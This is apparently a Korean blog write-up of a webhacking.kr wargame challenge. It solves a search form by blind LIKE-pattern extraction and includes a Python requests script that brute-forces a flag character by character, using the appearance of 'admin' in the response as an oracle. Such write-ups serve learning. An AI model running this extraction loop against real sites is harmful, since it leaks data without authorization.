왠지 blind sql injection 일 것만 같은 문제이다.
보통 저런 검색폼은 like '%{}%' 형식으로 되어 있기 때문에 어떤 컬럼을 기준으로 검색하는 지 알아봐야겠다.
FLAG라는 문구를 쳐보니까 admin만 나온다.
아마 저 subject 안의 내용을 토대로 검색이 되는 것으로 보인다.
import requests
start = "flag{"
for j in range(100):
for i in range(33,126):
if i == 37:
continue
r = requests.post(url, data={'search':start+f'{chr(i)}'},cookies={'PHPSESSID':'SESSION'})
if 'admin' in r.text:
print(f"{j} -> {chr(i)}")
start += chr(i)
break
print(start)
flag{ 글자를 먼저 넣어놓고, blind injection을 수행했다.
특수문자까지 모두 끼워넣고 했는데, % 는 제외해야 한다.
풀었다!
'Web > webhacking.kr' 카테고리의 다른 글
| Webhacking.kr old-44 (0) | 2025.05.26 |
|---|---|
| Webhacking.kr old-03 (0) | 2025.05.09 |
| Webhacking.kr old-07 (0) | 2025.05.08 |
| Webhacking.kr old-21 (0) | 2025.05.07 |
| Webhacking.kr RPG-1 (1) | 2025.05.07 |